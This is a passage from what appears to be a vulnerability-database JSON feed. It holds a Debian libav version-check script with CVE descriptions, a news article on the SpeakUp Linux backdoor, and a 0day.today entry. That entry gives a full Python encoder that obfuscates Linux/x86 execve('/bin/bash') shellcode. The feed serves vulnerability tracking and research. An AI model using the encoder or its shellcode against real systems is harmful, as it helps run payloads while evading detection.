8 'Jessie', these problems have been fixed in version\n6:11.12-1~deb8u5.\n\nWe recommend that you upgrade your libav packages.\");\n script_tag(name:\"summary\", value:\"Several security issues have been corrected in multiple demuxers and\ndecoders of the libav multimedia library.\n\nCVE-2014-8542\n\nlibavcodec/utils.c omitted a certain codec ID during enforcement of\nalignment, which allowed remote attackers to cause a denial of ervice\n(out-of-bounds access) or possibly have unspecified other impact via\ncrafted JV data.\n\nCVE-2015-1207\n\nDouble-free vulnerability in libavformat/mov.c allowed remote\nattackers to cause a denial of service (memory corruption and crash)\nvia a crafted .m4a file.\n\nCVE-2017-7863\n\nlibav had an out-of-bounds write caused by a heap-based buffer\noverflow related to the decode_frame_common function in\nlibavcodec/pngdec.c.\n\nCVE-2017-7865\n\nlibav had an out-of-bounds write caused by a heap-based buffer\noverflow related to the ipvideo_decode_block_opcode_0xA function in\nlibavcodec/interplayvideo.c and the avcodec_align_dimensions2\nfunction in libavcodec/utils.c.\n\nCVE-2017-14169\n\nIn the mxf_read_primer_pack function in libavformat/mxfdec.c in, an\ninteger signedness error might have occurred when a crafted file,\nclaiming a large 'item_num' field such as 0xffffffff, was provided.\nAs a result, the variable 'item_num' turned negative, bypassing the\ncheck for a large value.\n\nCVE-2017-14223\n\nIn libavformat/asfdec_f.c a DoS in asf_build_simple_index() due to\nlack of an EOF (End of File) check might have caused huge CPU\nconsumption. When a crafted ASF file, claiming a large 'ict' field in\nthe header but not containing sufficient backing data, was provided,\nthe for loop would have consumed huge CPU and memory resources, since\nthere was no EOF check inside the loop.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libav-dbg\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libav-doc\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libav-tools\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavcodec-dev\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavcodec-extra\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavcodec-extra-56\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavcodec56\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavdevice-dev\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavdevice55\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavfilter-dev\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavfilter5\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavformat-dev\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavformat56\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavresample-dev\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavresample2\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavutil-dev\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavutil54\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libswscale-dev\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libswscale3\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2019-02-06T09:02:58", "bulletinFamily": "exploit", "description": "Exploit for linux/x86 platform in category shellcode", "modified": "2019-02-05T00:00:00", "published": "2019-02-05T00:00:00", "id": "1337DAY-ID-32134", "href": "https://0day.today/exploit/description/32134", "title": "Linux/x86 - Random Insertion Encoder and Decoder Shellcode (Generator)", "type": "zdt", "sourceData": "#!/usr/bin/python\r\n# Python Random Insertion Encoder\r\n# Author: Aditya Chaudhary\r\n# Date: 5th Feb 2019\r\n\r\n\r\nimport random\r\nimport sys\r\nimport argparse\r\n\r\nshellcode = (\"\\x31\\xc0\\x50\\x89\\xe2\\x68\\x62\\x61\\x73\\x68\\x68\\x62\\x69\\x6e\\x2f\\x68\\x2f\\x2f\\x2f\\x2f\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\")\r\n\r\n# Parse Arguments\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"-e\", \"--entropy\", help=\"Entropy of random byted to be inserted after each shellcode byte (use a value between 1 & 10)\", type=int)\r\nparser.add_argument(\"-b\", \"--badchars\", help=\"Badchars to removed from inserted bytes\", type=str)\r\nargs = parser.parse_args()\r\n\r\n\r\nencoded = \"\"\r\nencoded2 = \"\"\r\n\r\n\r\nentropy = args.entropy\r\nbad_chars = args.badchars\r\n#print len(sys.argv)\r\n#if len(sys.argv) > 1:\r\n#\tentropy = int(sys.argv[1])\r\n\r\nprint '[#] Using Entropy: %s (inserting 1 to %s random number of bytes)'%(entropy, entropy)\r\n\r\n#if len(sys.argv) < 3:\r\n#\tprint '[#] No Bad characters provided'\r\n#else:\r\n#\tbad_chars = str(sys.argv[2])\r\nbad_chars = bad_chars.split(',')\r\nprint '[#] Bad chars: %s'%(bad_chars)\r\n\r\n# Generate byte string from \\x01 to \\xff\r\nchars = []\r\nfor o in range(256):\r\n #print(hex(o))\r\n\tch = '%02x' % o\r\n\tif ch not in bad_chars:\r\n\t\tchars.append(ch)\r\n\r\n\r\nprint '[#] Generating Shellcode...'\r\n\r\nrepeat = 0\r\n\r\nfor x in bytearray(shellcode) :\r\n\trepeat = random.randint(1, entropy)\r\n\t#print \"[#]\"+str(repeat)\r\n\tencoded += '\\\\x'\r\n\tencoded += '%02x' % x\r\n\tencoded += '\\\\x'\r\n\tencoded += '%02x'% repeat\r\n\r\n\tencoded2 += '0x'\r\n\tencoded2 += '%02x,' % x\r\n\tencoded2 += '0x'\r\n\tencoded2 += '%02x,' % repeat\r\n\r\n\ten_byte = \"\"\r\n\tfor i in range(1, repeat+1):\r\n\t\t# print i\r\n\t\ten_byte = chars[random.randint(0, len(chars)-1)]\r\n\r\n\t\tencoded += '\\\\x%s' % en_byte\r\n\t\t# encoded += '\\\\x%02x' % random.randint(1,255)\r\n\t\tencoded2 += '0x%s,' % en_byte\r\n\t\t# encoded2 += '0x%02x,' % random.randint(1,255)\r\n\t#encoded += '\\n'\r\n\r\n\r\nprint '[#] Encoded shellcode:'\r\n\r\nprint encoded\r\nprint encoded2\r\n\r\nprint '[#] Shellcode Length: %d' % len(bytearray(shellcode))\r\nprint '[#] Encoded Shellcode Length: %d' % encoded.count('x')\n\n# 0day.today [2019-02-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32134"}], "threatpost": [{"lastseen": "2019-02-04T19:46:57", "bulletinFamily": "info", "description": "LAS VEGAS \u2014 A backdoor trojan dubbed \u201cSpeakUp\u201d has been spotted exploiting the Linux servers that run more than 90 percent of the top 1 million domains in the U.S. It uses a complex bag of tricks to infect hosts and to propagate, which analysts say could indicate that it\u2019s poised for a major offensive involving a vast number of infected hosts, potentially worldwide.\n\nAccording to Check Point research released Monday at the CPX360 event in Las Vegas, SpeakUp (so-named after its command-and-control domain, SpeakUpOmaha[dot]com) is being used in a cryptomining campaign that is gaining momentum and has targeted more than 70,000 servers worldwide so far in what could be the foundation for a very formidable botnet.\n\nSpeakUp targets on-premises servers as well as cloud-based machines, such as those hosted by Amazon Web Services; and, it doesn\u2019t stop at Linux: It also has the ability to infect MacOS devices.\n\nOded Vanunu, head of products vulnerability research for Check Point, told Threatpost that the scope of this attack includes all servers running ThinkPHP, Hadoop Yarn, Oracle WebLogic, Apache ActiveMQ and Red Hat JBoss. And, he said that since these software can be deployed on virtual servers, all cloud infrastructure are also prone to be affected.\n\nThe actual trojan itself can affect all Linux distributions and MacOS.\n\n## Infection Routine\n\nThe initial infection vector starts with targeting a recently reported RCE vulnerability in ThinkPHP (CVE-2018-20062); the code uses command-injection techniques for uploading a PHP shell that serves and executes a Perl backdoor.\n\nThe routine is heavily obfuscated: Using a GET request, exploit code is sent to the targeted server. The resulting uploaded PHP shell then sends another HTTP request to the targeted server, with a standard injection function that pulls the ibus payload and stores it. The payload execution is then kicked off using an additional HTTP request. That executes the Perl script, puts it to sleep for two seconds and deletes the file to remove any evidence of infection.\n\nAfter registering the victim machine with the C2, Check Point analysts found that SpeakUp continuously asks for new tasks on a fixed-interval basis of every three seconds. The C2 can say \u201cno task\u201d \u2013 or, it can tell it to execute arbitrary code on the local machine, download and execute a file from any remote server, kill or uninstall the program, or send updated fingerprint data.\n\n\u201cThe beauty is that the threat actor has a foothold on any infected server,\u201d Vanunu said. \u201cWhich means he can adapt new future vulnerabilities, and deploy the new code, which will attempt exploit further using new techniques. If the threat actor decides to implement some more infection techniques the number of bots could easily scale up.\u201d\n\nThe campaign would be immediately scaled as well, since a threat actor would be able to download a piece of malware to all infected hosts at once.\n\n\u201cThe infected hosts are checking the C2 server for new commands every three minutes,\u201d said Vanunu.\n\n\u201cThe threat actor [may also be able to] sell the infected hosts to any threat actor and deploy any type of malware to the highest bidder,\u201d he added.\n\n## Highly Sophisticated Propagation\n\nSpeakUp also comes equipped with a handy propagation script written in Python; its main functions are brute-forcing administrative panels using a pre-defined list of usernames and passwords; and scanning the network environment of the infected machine. For the latter function, it checks for availability of specific ports on servers that share the same internal and external subnet mask. The idea is to scan and infect more vulnerable Linux servers within its internal and external subnets, using a full bag of exploits.\n\nTo spread, SpeakUp\u2019s propagation code exploits known vulnerabilities in six different Linux distributions, including JBoss Enterprise Application Platform security bypass vulnerabilities (CVE-2012-0874); a JBoss Seam Framework remote code execution (RCE) flaw (CVE-2010-1871); a JBoss AS 3/4/5/6 RCE exploit; a Oracle WebLogic wls-wsat Component Deserialization RCE (CVE-2017-10271); a vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (CVE-2018-2894); a Hadoop YARN ResourceManager command-execution exploit; and an Apache ActiveMQ Fileserver File Upload RCE vulnerability (CVE-2016-3088).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/01154122/SpeakUp-Infection-Rate.png>)\n\nSpeakUp\u2019s daily infection rate (click to enlarge)\n\n\u201cA successful exploitation of one of the vulnerabilities will result in deploying the original ibus script on the exploited server,\u201d according to Check Point\u2019s analysis, which added that it also has the capability to infect Macs.\n\n## A Bigger Threat in the Making?\n\nRight now, the observed file downloads that the backdoor is dropping are simple Monero-mining scripts. However, SpeakUp\u2019s authors have the ability to download any code they want to the servers. Check Point analysts said that the mining code could be a sort of beta test ahead of a much more concerning malware drop to come.\n\n\u201cAt the moment SpeakUp serves XMRig miners to its listening infected servers,\u201d according to the research. According to [XMRHunter,](<https://www.xmrhunter.com/>) the wallets hold a total of around 107 Monero coins right now, which is small potatoes in the grand scheme of things.\n\n\u201cSpeakUp\u2019s obfuscated payloads and propagation technique is beyond any doubt the work of a bigger threat in the making,\u201d according to the analysis. \u201cIt is hard to imagine anyone would build such a compound array of payloads just to deploy few miners. The threat actor behind this campaign can at any given time deploy additional payloads, potentially more intrusive and offensive. It has the ability to scan the surrounding network of an infected server and distribute the malware.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/01153817/SpeakUp-VT.png>)\n\nSpeakUp has no detections in VirusTotal.\n\nThe initial victims have in Eastern Asia and Latin America, but researchers believe that the U.S. could be the next target, if not the rest of the world. Given the impressive propagation tactics, a non-existent detection rate on VirusTotal, and the fact that the threat surface contains servers that run the top sites on the internet, SpeakUp could end up being a very big deal, researchers said: \u201cThis campaign, while still relatively new, can evolve into something bigger and potentially more harmful\u2026[and] at the time of writing this article, it has no detections in VirusTotal.\u201d\n\n## Attribution\n\nWhile the exact identity of the threat actor behind this new attack is still unconfirmed, it\u2019s clear that it\u2019s someone or a group with plenty of malware-authoring chops.\n\n\u201cWhile currently we\u2019ve spotted a cryptocurrency mining payload, the most notable aspect is the spreading abilities demonstrated in the code,\u201d Vanunu told Threatpost. \u201cNot only this was highly obfuscated, the variety of exploits used could potentially mean we have a highly skilled threat actor behind it.\u201d\n\nCheck Point researchers were able to correlate SpeakUp\u2019s author with a possibly Russian-speaking malware developer under the name of Zettabit.\n\n\u201cAlthough SpeakUp is implemented differently [than Zettabit\u2019s other code], it has a lot in common with Zettabit\u2019s craftmanship,\u201d according to the analysis.\n\nIn terms of what links Zettabit to this malware, \u201cwe\u2019ve read all of his Hack Forums posts and Github projects, so this avatar definitely knows his way around botnets,\u201d Vanunu told Threatpost. \u201cHe even released a free example of botnet code for anyone to use. And while researching, we\u2019ve identified two unique strings that were mentioned and used by Zettabit himself a couple of time in the past.\u201d\n\n_This story was updated at 2:23 p.m. ET on February 4 to reflect additional details from the researchers. _\n", "modified": "2019-02-04T09:00:15", "published": "2019-02-04T09:00:15", "id": "THREATPOST:260D48C8E6CF572D5CE165F85C7265E6", "href": "https://threatpost.com/speakup-linux-backdoor/141431/", "type": "threatpost", "title": "SpeakUp Linux Backdoor Sets Up for Major Attack", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}